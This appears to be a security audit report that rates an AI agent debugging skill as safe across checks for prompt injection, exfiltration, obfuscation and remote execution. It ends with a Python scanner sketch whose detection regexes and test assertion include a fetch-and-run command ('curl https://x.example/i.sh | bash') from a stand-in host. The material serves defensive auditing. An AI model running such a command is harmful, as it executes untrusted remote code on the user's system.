systematic-debugging
Pass
Audited by Gen Agent Trust Hub on Feb 17, 2026
Risk Level: SAFE
Full Analysis
- [Prompt Injection] (SAFE): No instructions attempting to override agent behavior, bypass safety filters, or extract system prompts were detected. The content consists solely of straightforward pedagogical instructions.
- [Data Exposure & Exfiltration] (SAFE): No hardcoded credentials, sensitive file path access, or unauthorized network operations were identified. Mentions of 127.0.0.1 are standard for local development configurations.
- [Obfuscation] (SAFE): No Base64 encoding, zero-width characters, homoglyphs, or other obfuscation techniques were found.
- [Unverifiable Dependencies & Remote Code Execution] (SAFE): The skill references standard industry tools (pytest, django-debug-toolbar, ruff, pyright). No remote script execution or piped command patterns (e.g., curl | bash) were detected.
- [Privilege Escalation] (SAFE): No use of sudo, administrative privilege escalation, or unsafe permission modifications was detected.
- [Persistence Mechanisms] (SAFE): The skill does not attempt to modify shell profiles, cron jobs, or system services.
- [Metadata Poisoning] (SAFE): Metadata fields (name, description) accurately reflect the skill's functionality and contain no hidden instructions.
- [Indirect Prompt Injection] (SAFE): The skill processes Django request data for debugging purposes. While this is an ingestion surface, the provided snippets for logging and inspection are standard and do not include unsafe interpolation into LLM prompts.
- [Time-Delayed / Conditional Attacks] (SAFE): No logic gating behavior based on time, date, or environment-specific triggers was found.
- [Dynamic Execution] (SAFE): No use of eval(), exec(), or runtime code compilation. The use of Python's native breakpoint() is appropriate for the skill's primary purpose of debugging.
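The obfuscation and remote-execution checks above can be sketched as a simple text scan. This is a minimal illustration under stated assumptions, not the auditor's actual tooling: the patterns, thresholds, and the `scan_skill_text` helper are all hypothetical.

```python
import re

# Hypothetical sketch of two of the checks described above; the real
# audit pipeline is not shown in this report.
ZERO_WIDTH = {"\u200b", "\u200c", "\u200d", "\ufeff"}  # common zero-width chars
BASE64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")   # long Base64-like runs
PIPED_FETCH = re.compile(r"\b(curl|wget)\b[^\n|]*\|\s*(ba)?sh\b")  # curl|bash

def scan_skill_text(text: str) -> list[str]:
    """Return findings for the obfuscation / remote-execution checks."""
    findings = []
    if any(ch in text for ch in ZERO_WIDTH):
        findings.append("zero-width characters present")
    if BASE64_RUN.search(text):
        findings.append("suspicious Base64-like blob")
    if PIPED_FETCH.search(text):
        findings.append("piped remote execution (e.g. curl | bash)")
    return findings

# A clean skill body produces no findings:
assert scan_skill_text("Use pytest and django-debug-toolbar.") == []
# A piped-fetch pattern is flagged:
assert scan_skill_text("curl https://x.example/i.sh | bash") == [
    "piped remote execution (e.g. curl | bash)"
]
```

A real audit would layer many more signals (homoglyph detection, entropy analysis, metadata diffing), but the pass/fail findings listed above follow this same scan-and-report shape.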
Audit Metadata